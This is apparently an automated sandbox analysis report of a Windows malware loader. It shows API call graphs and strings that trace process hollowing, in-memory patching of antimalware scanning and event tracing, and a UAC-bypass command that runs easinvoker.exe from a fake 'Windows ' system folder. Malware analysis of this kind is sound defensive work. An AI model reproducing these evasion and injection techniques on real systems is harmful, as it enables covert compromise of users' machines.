41e47dc 11 API calls 59140->59141 59142 42274ba 59141->59142 59143 42274c4 GlobalAddAtomA 59142->59143 59144 41e4c4c 59143->59144 59145 42274da RegisterWindowMessageA 59144->59145 59172 41f7b44 59145->59172 59147 42274f1 59176 4227028 59147->59176 59149 42274fb 59184 4226dd4 59149->59184 59151 4227507 59188 4231538 59151->59188 59153 422751a 59205 4232740 59153->59205 59155 4227530 59222 41f72ec 44 API calls 59155->59222 59157 422755a GetModuleHandleA 59158 422757a 59157->59158 59159 422756a GetProcAddress 59157->59159 59160 41e4788 11 API calls 59158->59160 59159->59158 59161 422758f 59160->59161 59162 41e4788 11 API calls 59161->59162 59163 4227597 59162->59163 59164 41f7160 44 API calls 59163->59164 59164->59102 59165->59104 59166->59106 59167->59108 59168->59097 59223 41e9700 59169->59223 59173 41f7b4a 59172->59173 59174 41f7b5f InitializeCriticalSection 59173->59174 59175 41f7b74 59174->59175 59175->59147 59177 4227195 59176->59177 59178 422703c SetErrorMode 59176->59178 59177->59149 59179 4227060 GetModuleHandleA GetProcAddress 59178->59179 59180 422707c 59178->59180 59179->59180 59181 4227177 SetErrorMode 59180->59181 59182 4227089 LoadLibraryA 59180->59182 59181->59149 59182->59181 59183 42270a5 10 API calls 59182->59183 59183->59181 59185 4226dda 59184->59185 59243 4226fc4 59185->59243 59187 4226e48 59187->59151 59189 4231542 59188->59189 59256 41fd8bc 59189->59256 59191 4231558 59260 42318f4 LoadCursorA 59191->59260 59194 4231591 59195 42315cd GetDC GetDeviceCaps ReleaseDC 59194->59195 59196 4231603 59195->59196 59265 4201fe4 59196->59265 59198 423160f 59199 4201fe4 13 API calls 59198->59199 59200 4231621 59199->59200 59201 4201fe4 13 API calls 59200->59201 59202 4231633 59201->59202 59269 4231d24 59202->59269 59204 4231640 59204->59153 59206 423274f 59205->59206 59207 41fd8bc 42 API calls 59206->59207 59208 4232765 59207->59208 59209 4232822 LoadIconA 59208->59209 59307 4207524 59209->59307 59211 4232845 GetModuleFileNameA OemToCharA 59212 423288e 59211->59212 59213 42328b4 CharNextA CharLowerA 59212->59213 59214 42328dc 59213->59214 59309 41fea38 GetClassInfoA 59214->59309 59217 4232905 59320 4234b14 11 API calls 59217->59320 59218 42328fe 59319 4232a94 60 API calls 59218->59319 59221 4232927 59221->59155 59222->59157 59224 41e9726 59223->59224 59228 41e9759 59224->59228 59236 41e92f4 42 API calls 59224->59236 59226 41e9776 59230 41e97b7 59226->59230 59231 41e4788 11 API calls 59226->59231 59234 41e4ed4 11 API calls 59226->59234 59237 41e92f4 42 API calls 59226->59237 59227 41e97c3 59238 41e4878 59227->59238 59228->59226 59228->59227 59232 41e4ed4 11 API calls 59230->59232 59231->59226 59233 41e96fb 59232->59233 59233->59136 59234->59226 59236->59228 59237->59226 59239 41e484c 11 API calls 59238->59239 59240 41e4888 59239->59240 59241 41e4788 11 API calls 59240->59241 59242 41e48a0 59241->59242 59242->59233 59244 4226fd3 59243->59244 59246 4226fcc 59243->59246 59247 4226fe0 59244->59247 59248 4226fe9 59244->59248 59245 4226fd1 59245->59187 59246->59245 59249 4226ffe SystemParametersInfoA 59246->59249 59250 422700f SendMessageA 59246->59250 59254 4226f54 6 API calls 59247->59254 59255 4226f24 SystemParametersInfoA 59248->59255 59249->59245 59250->59245 59253 4226ff0 59253->59187 59254->59245 59255->59253 59257 41fd8c3 59256->59257 59259 41fd8e8 59257->59259 59287 41fda78 42 API calls 59257->59287 59259->59191 59261 4231913 59260->59261 59262 423192c LoadCursorA 59261->59262 59264 423157b GetKeyboardLayout 59261->59264 59288 42319b0 59262->59288 59264->59194 59266 4201fea 59265->59266 59291 42014f0 59266->59291 59268 420200c 59268->59198 59271 4231d3d 59269->59271 59270 4231d6f SystemParametersInfoA 59272 4231d82 CreateFontIndirectA 59270->59272 59273 4231d9a GetStockObject 59270->59273 59271->59270 59301 4202434 16 API calls 59272->59301 59302 4202434 16 API calls 59273->59302 59276 4231d98 59277 4231dae SystemParametersInfoA 59276->59277 59278 4231e02 59277->59278 59279 4231dce CreateFontIndirectA 59277->59279 59305 4202518 16 API calls 59278->59305 59303 4202434 16 API calls 59279->59303 59282 4231e12 GetStockObject 59306 4202434 16 API calls 59282->59306 59283 4231de7 CreateFontIndirectA 59304 4202434 16 API calls 59283->59304 59286 4231e00 59286->59204 59287->59259 59289 41e2cac 11 API calls 59288->59289 59290 42319c3 59289->59290 59290->59261 59292 420150b 59291->59292 59299 42014d8 EnterCriticalSection 59292->59299 59294 4201515 59295 41e2cac 11 API calls 59294->59295 59297 4201572 59294->59297 59295->59297 59300 42014e4 LeaveCriticalSection 59297->59300 59298 42015c3 59298->59268 59299->59294 59300->59298 59301->59276 59302->59277 59303->59283 59304->59286 59305->59282 59306->59286 59308 4207530 59307->59308 59308->59211 59310 41fea68 59309->59310 59311 41fea91 59310->59311 59312 41fea87 RegisterClassA 59310->59312 59313 41fea76 UnregisterClassA 59310->59313 59321 41e738c 59311->59321 59312->59311 59313->59312 59315 41feabf 59316 41feadc 59315->59316 59325 41fe97c 59315->59325 59316->59217 59316->59218 59318 41fead3 SetWindowLongA 59318->59316 59319->59217 59320->59221 59328 41e2ffc 59321->59328 59323 41e739f CreateWindowExA 59324 41e73d9 59323->59324 59324->59315 59326 41fe98c VirtualAlloc 59325->59326 59327 41fe9ba 59325->59327 59326->59327 59327->59318 59328->59323 59330 41e159c 59329->59330 59330->59112 59331 41e1d08 59332 41e1d18 59331->59332 59333 41e1da0 59331->59333 59336 41e1d5c 59332->59336 59337 41e1d25 59332->59337 59334 41e1da9 59333->59334 59335 41e1ff4 59333->59335 59338 41e1dc1 59334->59338 59352 41e1ec0 59334->59352 59341 41e2088 59335->59341 59345 41e2048 59335->59345 59346 41e2004 59335->59346 59339 41e17c0 10 API calls 59336->59339 59340 41e1d30 59337->59340 59379 41e17c0 59337->59379 59342 41e1dc8 59338->59342 59349 41e1de4 59338->59349 59353 41e1e98 59338->59353 59343 41e1d73 59339->59343 59367 41e1b28 8 API calls 59343->59367 59370 41e1d99 59343->59370 59350 41e204e 59345->59350 59354 41e17c0 10 API calls 59345->59354 59351 41e17c0 10 API calls 59346->59351 59347 41e1f18 59348 41e17c0 10 API calls 59347->59348 59363 41e1f31 59347->59363 59369 41e1fc8 59348->59369 59357 41e1e38 59349->59357 59358 41e1e15 Sleep 59349->59358 59355 41e201e 59351->59355 59352->59347 59356 41e1ef1 Sleep 59352->59356 59352->59363 59359 41e17c0 10 API calls 59353->59359 59364 41e205d 59354->59364 59371 41e1b28 8 API calls 59355->59371 59374 41e2043 59355->59374 59356->59347 59360 41e1f0b Sleep 59356->59360 59358->59357 59361 41e1e2d Sleep 59358->59361 59373 41e1ea1 59359->59373 59360->59352 59361->59349 59362 41e1d3d 59368 41e1d55 59362->59368 59403 41e1b28 59362->59403 59364->59374 59375 41e1b28 8 API calls 59364->59375 59366 41e1eb9 59367->59370 59369->59363 59372 41e1b28 8 API calls 59369->59372 59371->59374 59376 41e1fec 59372->59376 59373->59366 59377 41e1b28 8 API calls 59373->59377 59378 41e2080 59375->59378 59377->59366 59380 41e1a04 59379->59380 59383 41e17d8 59379->59383 59381 41e1b1c 59380->59381 59382 41e19d4 59380->59382 59384 41e1b25 59381->59384 59385 41e1720 VirtualAlloc 59381->59385 59389 41e19e3 Sleep 59382->59389 59396 41e1a22 59382->59396 59386 41e17ea 59383->59386 59391 41e1867 Sleep 59383->59391 59384->59362 59387 41e175b 59385->59387 59388 41e174b 59385->59388 59390 41e17f9 59386->59390 59393 41e18c8 59386->59393 59397 41e18a6 Sleep 59386->59397 59387->59362 59420 41e16e0 59388->59420 59394 41e19f9 Sleep 59389->59394 59389->59396 59390->59362 59391->59386 59395 41e1880 Sleep 59391->59395 59401 41e1668 VirtualAlloc 59393->59401 59402 41e18d4 59393->59402 59394->59382 59395->59383 59398 41e1668 VirtualAlloc 59396->59398 59400 41e1a40 59396->59400 59397->59393 59399 41e18bc Sleep 59397->59399 59398->59400 59399->59386 59400->59362 59401->59402 59402->59362 59404 41e1b3d 59403->59404 59405 41e1c08 59403->59405 59407 41e1b43 59404->59407 59408 41e1baf Sleep 59404->59408 59406 41e1784 59405->59406 59405->59407 59410 41e1d02 59406->59410 59412 41e16e0 2 API calls 59406->59412 59409 41e1b4c 59407->59409 59413 41e1be7 Sleep 59407->59413 59417 41e1c1d 59407->59417 59408->59407 59411 41e1bc9 Sleep 59408->59411 59409->59368 59410->59368 59411->59404 59414 41e1791 VirtualFree 59412->59414 59415 41e1bfd Sleep 59413->59415 59413->59417 59416 41e17a9 59414->59416 59415->59407 59416->59368 59418 41e1c9c VirtualFree 59417->59418 59419 41e1c40 59417->59419 59418->59368 59419->59368 59421 41e171d 59420->59421 59422 41e16e9 59420->59422 59421->59387 59422->59421 59423 41e16eb Sleep 59422->59423 59424 41e1700 59423->59424 59424->59421 59425 41e1704 Sleep 59424->59425 59425->59422 59426 41e4fa4 59427 41e4fcb 59426->59427 59428 41e4fa8 59426->59428 59429 41e4f68 59428->59429 59432 41e4fbb SysReAllocStringLen 59428->59432 59430 41e4f6e SysFreeString 59429->59430 59431 41e4f7c 59429->59431 59430->59431 59432->59427 59433 41e4f38 59432->59433 59434 41e4f54 59433->59434 59435 41e4f44 SysAllocStringLen 59433->59435 59435->59433 59435->59434 59436 41e51e4 59437 41e51f1 59436->59437 59441 41e51f8 59436->59441 59445 41e4f38 SysAllocStringLen 59437->59445 59442 41e4f58 59441->59442 59443 41e4f5e SysFreeString 59442->59443 59444 41e4f64 59442->59444 59443->59444 59445->59441 59446 423c788 59447 423c79f 59446->59447 59448 423c7ca RegOpenKeyA 59447->59448 59449 423c7d8 59448->59449 59450 41e4ca4 11 API calls 59449->59450 59451 423c7f0 59450->59451 59452 423c7fd RegSetValueExA RegCloseKey 59451->59452 59453 41e47ac 11 API calls 59452->59453 59454 423c82e 59453->59454 59455 41e4788 11 API calls 59454->59455 59456 423c836 59455->59456 59457 420765c MulDiv 59458 4207698 59457->59458 59459 42076ae 59457->59459 59523 4207618 GetDC SelectObject GetTextMetricsA ReleaseDC 59458->59523 59473 4200204 59459->59473 59462 420769d 59462->59459 59524 41e4820 59462->59524 59463 42076ba 59477 42002a4 59463->59477 59470 4207701 59474 420020a 59473->59474 59475 4200222 59474->59475 59476 42002a4 14 API calls 59474->59476 59475->59463 59476->59475 59478 42002b1 59477->59478 59479 42002cb 59477->59479 59480 42002c1 59478->59480 59481 42002b7 RegCloseKey 59478->59481 59483 4200308 59479->59483 59529 4200274 13 API calls 59480->59529 59481->59480 59484 41e4820 11 API calls 59483->59484 59485 4200331 59484->59485 59487 4200351 59485->59487 59530 41e4cec 11 API calls 59485->59530 59488 4200373 RegOpenKeyExA 59487->59488 59489 4200385 59488->59489 59493 42003c1 59488->59493 59490 42003af 59489->59490 59491 41e4b0c 11 API calls 59489->59491 59531 42002d0 13 API calls 59490->59531 59491->59490 59495 42003de RegOpenKeyExA 59493->59495 59494 42003bc 59498 41e4788 11 API calls 59494->59498 59496 42003f0 59495->59496 59502 4200429 59495->59502 59497 420041a 59496->59497 59499 41e4b0c 11 API calls 59496->59499 59532 42002d0 13 API calls 59497->59532 59501 42004a1 59498->59501 59499->59497 59501->59470 59508 4200538 59501->59508 59503 4200443 RegOpenKeyExA 59502->59503 59503->59494 59504 4200455 59503->59504 59505 420047f 59504->59505 59506 41e4b0c 11 API calls 59504->59506 59505->59494 59533 42002d0 13 API calls 59505->59533 59506->59505 59534 4200510 59508->59534 59511 42005a1 59513 41e4788 11 API calls 59511->59513 59512 4200552 59514 41e4878 11 API calls 59512->59514 59521 4200596 59513->59521 59515 420055d 59514->59515 59537 42005b0 59515->59537 59517 4200575 59518 4200598 59517->59518 59520 4200581 59517->59520 59543 420019c 42 API calls 59518->59543 59522 41e4ed4 11 API calls 59520->59522 59528 4200274 13 API calls 59521->59528 59522->59521 59523->59462 59526 41e4824 59524->59526 59525 41e4848 59525->59459 59526->59525 59527 41e2cc8 11 API calls 59526->59527 59527->59525 59528->59470 59529->59479 59530->59487 59531->59494 59532->59494 59533->59494 59544 42004c0 59534->59544 59536 4200524 59536->59511 59536->59512 59538 41e4c4c 59537->59538 59539 42005d6 RegQueryValueExA 59538->59539 59540 42005e4 59539->59540 59541 4200603 59539->59541 59548 41ec184 42 API calls 59540->59548 59541->59517 59543->59521 59545 42004d9 59544->59545 59546 42004ed RegQueryValueExA 59545->59546 59547 4200504 59546->59547 59547->59536 59548->59541
                                                                                                                                  APIs
                                                                                                                                  • InetIsOffline.URL(00000000,00000000,04247AA9,?,?,?,000002BA,00000000,00000000), ref: 0423CA75
                                                                                                                                    • Part of subcall function 041FFD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD70
                                                                                                                                    • Part of subcall function 041FFD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD7E
                                                                                                                                    • Part of subcall function 041FFD38: GetProcAddress.KERNEL32(74B80000,00000000), ref: 041FFD97
                                                                                                                                    • Part of subcall function 041FFD38: GetCurrentProcess.KERNEL32(0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB3
                                                                                                                                    • Part of subcall function 041FFD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB9
                                                                                                                                    • Part of subcall function 041FFD38: GetCurrentProcess.KERNEL32(0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE3
                                                                                                                                    • Part of subcall function 041FFD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE9
                                                                                                                                    • Part of subcall function 041FFD38: FreeLibrary.KERNEL32(74B80000,00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000), ref: 041FFDF4
                                                                                                                                    • Part of subcall function 041E8DE0: GetFileAttributesA.KERNEL32(00000000,?,0423D4C6,ScanString,0427A350,04247AE0,OpenSession,0427A350,04247AE0,ScanString,0427A350,04247AE0,UacScan,0427A350,04247AE0,UacInitialize), ref: 041E8DEB
                                                                                                                                    • Part of subcall function 041ED570: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0436EB38,?,0423D7E7,ScanBuffer,0427A350,04247AE0,OpenSession,0427A350,04247AE0,ScanBuffer,0427A350,04247AE0,OpenSession), ref: 041ED587
                                                                                                                                    • Part of subcall function 0423B768: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0423B838), ref: 0423B7A3
                                                                                                                                    • Part of subcall function 0423B768: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0423B838), ref: 0423B7D3
                                                                                                                                    • Part of subcall function 0423B768: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0423B7E8
                                                                                                                                    • Part of subcall function 0423B768: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0423B814
                                                                                                                                    • Part of subcall function 0423B768: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0423B81D
                                                                                                                                    • Part of subcall function 041E8E04: GetFileAttributesA.KERNEL32(00000000,?,0424062B,ScanString,0427A350,04247AE0,OpenSession,0427A350,04247AE0,OpenSession,0427A350,04247AE0,ScanBuffer,0427A350,04247AE0,ScanString), ref: 041E8E0F
                                                                                                                                    • Part of subcall function 041E8FCC: CreateDirectoryA.KERNEL32(00000000,00000000,?,042406D1,ScanBuffer,0427A350,04247AE0,ScanString,0427A350,04247AE0,OpenSession,0427A350,04247AE0,OpenSession,0427A350,04247AE0), ref: 041E8FD9
                                                                                                                                    • Part of subcall function 0423B684: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0423B756), ref: 0423B6C3
                                                                                                                                    • Part of subcall function 0423B684: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0423B6FD
                                                                                                                                    • Part of subcall function 0423B684: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0423B72A
                                                                                                                                    • Part of subcall function 0423B684: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0423B733
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Path$Name$AttributesCloseCreateCurrentLibraryMemoryModuleName_ProcessVirtualWrite$AddressDirectoryFreeHandleInetInformationLoadOfflineOpenProcProtectQueryRead
                                                                                                                                  • String ID: .png$.url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\System32\\easinvoker.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$advapi32$bcrypt$can$cmd /c "C:\\Windows \\System32\\easinvoker.exe"$connect$endpointdlp$http$iexpress.exe$kernel32$mssip32$ntdll$psapi$smartscreenps$spp$sppc$sppwmi$wintrust$ws2_32
                                                                                                                                  • API String ID: 2178617691-2902499223
                                                                                                                                  • Opcode ID: 160ee265cddddf79f3af9393b17ee0af76f3e6eb4d9f9c7ca8f5d204c5647d55
                                                                                                                                  • Instruction ID: 7546a1c4f1b418431e3ad8a47e3a10ea40cc3df4cb01620c569b068f93f8ce63
                                                                                                                                  • Opcode Fuzzy Hash: 160ee265cddddf79f3af9393b17ee0af76f3e6eb4d9f9c7ca8f5d204c5647d55
                                                                                                                                  • Instruction Fuzzy Hash: 35F3FB39B11519CBEB14EB65DDC0AEEB3B9EFC8308F1045A2E149A7650DB31BE468F44
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 4211 4207e4c-4207e4f 4212 4207e54-4207e59 4211->4212 4212->4212 4213 4207e5b-4207ee9 call 41e4c3c call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 4212->4213 4230 42096ad-42096f5 call 41e47ac * 2 call 41e4f68 call 41e47ac 4213->4230 4231 4207eef-4207fca call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 4213->4231 4231->4230 4268 4207fd0-42082e0 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e320c * 2 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e50e8 call 41e50f8 CreateProcessAsUserW 4231->4268 4375 42082e2-420834e call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 4268->4375 4376 4208353-42085d5 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e2f9c call 41e2fc4 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 GetThreadContext 4268->4376 4375->4376 4376->4230 4464 42085db-420883e call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 NtReadVirtualMemory 4376->4464 4535 4208844-42089ad call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 NtUnmapViewOfSection 4464->4535 4536 4208b4b-4208bb7 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 4464->4536 4622 42089d7-4208a43 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 4535->4622 4623 42089af-42089cb call 41ffb80 4535->4623 4563 4208bbc-4208ccb call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41ffb80 4536->4563 4563->4230 4627 4208cd1-4208dca call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 4207d5c 4563->4627 4631 4208a48-4208b3f call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41ffb80 4622->4631 4628 42089d0-42089d5 4623->4628 4701 4208dcc-4208e19 call 4207c54 call 41e737c 4627->4701 4702 4208e1e-42096a8 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 NtWriteVirtualMemory call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 NtWriteVirtualMemory call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 SetThreadContext NtResumeThread call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e2cc8 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41ffcd8 * 3 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41ffcd8 * 4 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 4627->4702 4628->4631 4703 4208b44-4208b49 4631->4703 4701->4702 4702->4230 4703->4563
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 041FFD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD70
                                                                                                                                    • Part of subcall function 041FFD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD7E
                                                                                                                                    • Part of subcall function 041FFD38: GetProcAddress.KERNEL32(74B80000,00000000), ref: 041FFD97
                                                                                                                                    • Part of subcall function 041FFD38: GetCurrentProcess.KERNEL32(0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB3
                                                                                                                                    • Part of subcall function 041FFD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB9
                                                                                                                                    • Part of subcall function 041FFD38: GetCurrentProcess.KERNEL32(0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE3
                                                                                                                                    • Part of subcall function 041FFD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE9
                                                                                                                                    • Part of subcall function 041FFD38: FreeLibrary.KERNEL32(74B80000,00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000), ref: 041FFDF4
                                                                                                                                  • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0427A408,0427A3F8,OpenSession,0427A3D0,04209710,ScanString,0427A3D0), ref: 042082D9
                                                                                                                                  • GetThreadContext.KERNEL32(000005E4,0427A44C,ScanString,0427A3D0,04209710,UacInitialize,0427A3D0,04209710,ScanBuffer,0427A3D0,04209710,ScanBuffer,0427A3D0,04209710,OpenSession,0427A3D0), ref: 042085CE
